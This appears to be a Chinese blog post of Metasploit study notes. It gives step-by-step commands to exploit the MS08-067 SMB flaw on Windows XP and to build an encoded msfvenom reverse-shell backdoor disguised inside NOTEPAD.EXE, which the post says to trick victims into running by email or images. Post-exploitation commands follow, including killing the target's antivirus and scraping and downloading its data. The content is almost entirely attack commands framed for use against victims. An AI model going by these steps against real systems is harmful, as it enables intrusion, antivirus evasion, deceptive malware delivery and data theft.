zoukankan      html  css  js  c++  java
  • Metasploit学习

    阶段一:初步渗透

     GO!

    msfconsole

     相关漏洞

    msf > search platform: windows xp sp3

     查看某个漏洞后,查看漏洞详细信息

    msf > info exploit/windows/smb/ms08_067_netapi

     选中漏洞

    msf > use exploit/windows/smb/ms08_067_netapi
    > set payload windows/meterpreter/bind_tcp
    > set RHOST 192.168.0.108  (设置目标主机IP地址)
    > exploit
    如果目标主机有这个漏洞的话,你就可以控制它了;如果没有,尝试使用其他漏洞。

    阶段二:后渗透(后门控制)

     在Kali Linux上生成后门程序,然后把它发送给受害者,欺骗受害者运行(使用邮件、图片等等)。难点是需要过杀毒软件和防火墙,使用加密试图躲过杀毒软件。

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4445 -x NOTEPAD.EXE -e x86/jmp_call_additive -i 4 -k -f exe > my_backdoor.exe
    如果不能运行换用其他加密方式。

     查看帮助

    man msfvenom

     启动msfconsole并

    use exploit/multi/handler
    
    set LHOST 192.168.0.112
    set LPORT 4445
    set payload windows/meterpreter/reverse_tcp
    show options
    exploit
    等待受害者启动后门程序

      

    阶段一补充

     显示内建的文档

    msf > help
    msf > help search

     查看可以利用的模块

    msf > show
    msf > show auxiliary
    msf > show exploits
    msf > show payloads
    msf > show encoders
    msf > show nops

     搜索可以利用的漏洞

    msf > search type:exploit
    msf > search CVE-xxxx-xxx
    msf > search cve:2014
    msf > search name:wordpress
    msf > search name:mysql
    msf > search path:scada
    msf > search platform:aix
    msf > search type:post
    msf > search windows type:exploit

     使用一个漏洞

    msf > use exploit/path/to/exploit_name

     设置payload

    msf > show payloads
    msf > set payload path/to/payload

     入侵

    msf > exploit

      

    阶段二补充

     运行靶机shell

    meterpreter > shell

     从目标主机shell退出到 meterpreter

    exit

     从 meterpreter 退出到MSF框架

    background

     查看获得的shell

    sessions -l

     切换到id为1的shell

    session  -i  1

     拿到shell后第一时间关掉目标杀毒软件

    run killav

     查看目标主机信息

    sysinfo

     将目标机器上的常见信息收集起来然后下载保存在本地

    run scraper

     访问文件系统

    cd:切换目标目录;
    cat:读取文件内容;
    rm:删除文件;
    edit:使用vim编辑文件
    ls:获取当前目录下的文件;
    mkdir:新建目录;
    rmdir:删除目录;

     上传/下载文件

    upload/download  file

    https://blog.csdn.net/qq_36119192/article/details/83215257#%E5%90%8E%E6%B8%97%E9%80%8F%E6%88%AA%E6%96%AD%C2%A0

  • 相关阅读:
    Mongodb学习总结-7(运维技术)
    Mongodb学习总结-6(分片技术)
    Mongodb学习总结-5(主从复制)
    Mongodb学习总结-4(索引操作)
    Mongodb学习总结-3(细说高级操作)
    Mongodb学习总结-2(细说增删查改)
    Mongodb学习总结-1(基础入门)
    nginx编译安装与apache动静分离共存设置及负载均衡设置
    yum 安装redis
    spring cache redis
  • 原文地址:https://www.cnblogs.com/p0pl4r/p/10545109.html
Copyright © 2011-2022 走看看